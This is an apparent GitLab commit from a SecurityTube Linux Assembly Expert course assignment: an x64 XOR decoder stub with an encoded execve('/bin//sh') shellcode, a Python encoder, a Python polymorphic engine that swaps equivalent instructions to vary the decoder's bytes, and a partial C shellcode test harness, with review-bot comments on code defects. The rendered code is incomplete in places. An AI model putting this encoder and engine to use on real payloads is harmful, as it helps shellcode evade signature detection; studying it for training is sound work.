Commit 03d95206 authored by André Lima's avatar André Lima


parent bcd18f43
global _start
section .text
jmp find_address ; jmp short by default
; Get the address of the string
pop rdi
push rdi
pop rbx
; get the first byte and bruteforce till you get the token 0x90
mov byte dl, [rdi]
xor rdi,rdi ; key that will be incremented from 0x00 to 0xff
inc rdi
mov al,dl
xor al,dil
cmp al,0x90
jne bruteforce
push 27 ; shellcode length (given by encoder)
pop rcx
mov al,dil
push rbx
pop rdi
xor byte [rdi], al
inc rdi
loop decode
jmp rbx ; jmp to decoded shellcode
call decoder
encoded db 0x23,0xd9,0x88,0xeb,0x2a,0xe1,0xfb,0x08,0x9c,0x9c,0xd1,0xda,0xdd,0x9c,0xc0,0xdb,0xe0,0xe7,0xec,0xe1,0xe7,0xed,0xe4,0xe7,0xe9,0xbc,0xb6
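Review bot: The decode loop (`xor byte [rdi], al` / `inc rdi` / `loop decode`) writes into `encoded`, which this file places in `section .text`; assembled and linked as an ordinary ELF the first store faults because the text segment is read-only, so the decoder only works once the bytes are copied into a mapping that is both writable and executable (which is what the C harness in this commit does). State that assumption at the top of the file, e.g. `; NOTE: decodes in place - encoded must live in writable+executable memory; a normally linked ELF faults on the first xor byte [rdi],al`. The labels the branches target (`find_address`, `decoder`, `bruteforce`, `decode`) do not appear in the rendered section; if that is not just the page rendering, the file does not assemble. A why-comment on `xor rdi,rdi` would also help, since it discards the address just popped and only `rbx` keeps the copy: `; rdi is now the candidate key; rbx still holds the address of encoded`.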
from random import randint
encoded = ""
encoded2 = ""
R = randint(0,2**8-1)
shellcode = ("\x90" + "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x54\x5e\x57\x54\x5a\x0f\x05")
print "random generated number (key): 0x%02x" %R
for x in bytearray(shellcode):
# XOR Encoding
y = x ^ R
encoded += "\\x"
encoded += "%02x" %y
encoded2 += "0x"
encoded2 += "%02x," %y
encoded2 = encoded2[0:-1] # the [0:-1] is just to remove the "," at the end
print "Encoded shellcode ..."
print encoded
print encoded2
print "Len: %d" % len(bytearray(shellcode))
tab = " "
poly_db = { "pop rdi":
[tab+"pop rdi\n",
tab+"mov rdi,[rsp]\n"+tab+"add rsp,8\n"],
"push <param1>|pop <param2>":
[tab+"push <param1>\n"+tab+"pop <param2>\n",
tab+"mov <param2>,<param1>\n"],
"mov byte dl,[rdi]":
[tab+"mov byte dl,[rdi]\n",
tab+"mov r9,rdi\n"+tab+"mov byte dl,[r9]\n"],
"xor rdi,rdi":
[tab+"xor rdi,rdi\n",
tab+"sub rdi,rdi\n"],
"inc rdi":
[tab+"inc rdi\n",
tab+"dec rdi\n"+tab+"add rdi,2\n"],
"mov byte <param1>,byte <param2>":
[tab+"mov <param1>,<param2>\n",
tab+"mov r9b,<param2>\n"+tab+"mov <param1>,r9b\n"],
"xor al,dil":
[tab+"xor al,dil\n",
tab+"mov r9b,dil\n"+tab+"xor al,r9b\n"],
"cmp al,0x90":
[tab+"cmp al,0x90\n",
tab+"mov ah,0xff\n"+tab+"cmp ax,0xff90\n"],
"push <number>|pop <param2>":
[tab+"push <param1>\n"+tab+"pop <param2>\n",
tab+"xor <param2>,<param2>\n"+tab+"add <param2>,<param1>\n"],
"xor byte [rdi],al":
[tab+"xor byte [rdi],al\n",
tab+"mov byte r9b,[rdi]\n"+tab+"xor r9b,al\n"+tab+"mov byte [rdi],r9b\n"],
"loop decode":
[tab+"loop decode\n",
tab+"dec rcx\n"+tab+"xor r9,r9\n"+tab+"cmp r9,rcx\n"+tab+"jne decode\n"]
def poly(instruction,param1="",param2="",param3=""):
options = poly_db[instruction]
r = randint(0,len(options)-1)
str = options[r]
str = str.replace("<param1>",param1)
str = str.replace("<param2>",param2)
str = str.replace("<param3>",param3)
return str
code = "global _start \n"
code += "\n"
code += "section .text\n"
code += "\n"
code += "_start:\n"
code += " jmp short find_address\n"
code += "decoder:\n"
code += " ; Get the address of the string \n"
code += poly("pop rdi")
code += poly("push <param1>|pop <param2>","rdi","rbx")
code += "\n"
code += " ; get the first byte and bruteforce till you get the token 0x90\n"
code += poly("mov byte dl,[rdi]")
code += poly("xor rdi,rdi") # key that will be incremented from 0x00 to 0xff
code += "bruteforce:\n"
code += poly("inc rdi")
code += poly("mov byte <param1>,byte <param2>","al","dl")
code += poly("xor al,dil")
code += poly("cmp al,0x90")
code += " jne bruteforce\n"
code += "\n"
code += poly("push <number>|pop <param2>",str(len(bytearray(shellcode))),"rcx")
code += poly("mov byte <param1>,byte <param2>","al","dil")
code += poly("push <param1>|pop <param2>","rbx","rdi")
code += "decode:\n"
code += poly("xor byte [rdi],al")
code += poly("inc rdi")
code += poly("loop decode")
code += "\n"
code += " jmp rbx\n" # jmp to decoded shellcode
code += " \n"
code += "find_address:\n"
code += " call decoder\n"
code += " encoded db " + encoded2 + "\n"
fout = open("decoder.nasm","w")
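Review bot: `poly` rebinds the builtin `str` as a local (`str = options[r]`), while the module-level call `poly("push <number>|pop <param2>", str(len(bytearray(shellcode))), "rcx")` relies on the builtin; it works only because the shadowing is function-local, and the next reader will trip over it, so rename to `text = options[r]` and adjust the three `.replace` lines. `poly` also has no docstring; add one stating that `instruction` must be a key of `poly_db`, that one of its equivalent instruction sequences is chosen with `randint`, and that the `<param1>`/`<param2>`/`<param3>` placeholders are substituted textually with no validation of the register or number passed. The handle opened as `fout` at the end of the section is never written or closed in the visible lines (and `poly_db` has no closing brace here); if that is not just the page rendering, prefer `with open("decoder.nasm", "w") as fout: fout.write(code)`. Lastly, `randint(0, 2**8-1)` can pick key 0, which leaves the payload byte-for-byte unchanged; a comment next to it should say so, as nothing in the output indicates that case.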
unsigned char code[] = \
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
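Review bot: `strlen(code)` in the printf stops at the first 0x00 byte, so the reported length is wrong whenever the array contains one; `sizeof(code) - 1` gives the true byte count of the string literal. The array initializer on the preceding line is cut off in the rendered section and the call through `ret` is not visible, so the remainder of this file cannot be reviewed here. The cast `(int(*)())code` turns a data array into a function pointer; a comment recording that the harness assumes the array is mapped executable would spare the next reader a silent SIGSEGV.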
......@@ -4,6 +4,9 @@ Assigment 2 - x64 rev tcp shell with auth
Assigment 3 - x64 Egg hunter
Assigment 4 - Custom x64 encoder with a basic polymorphic engine implementation
This code has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: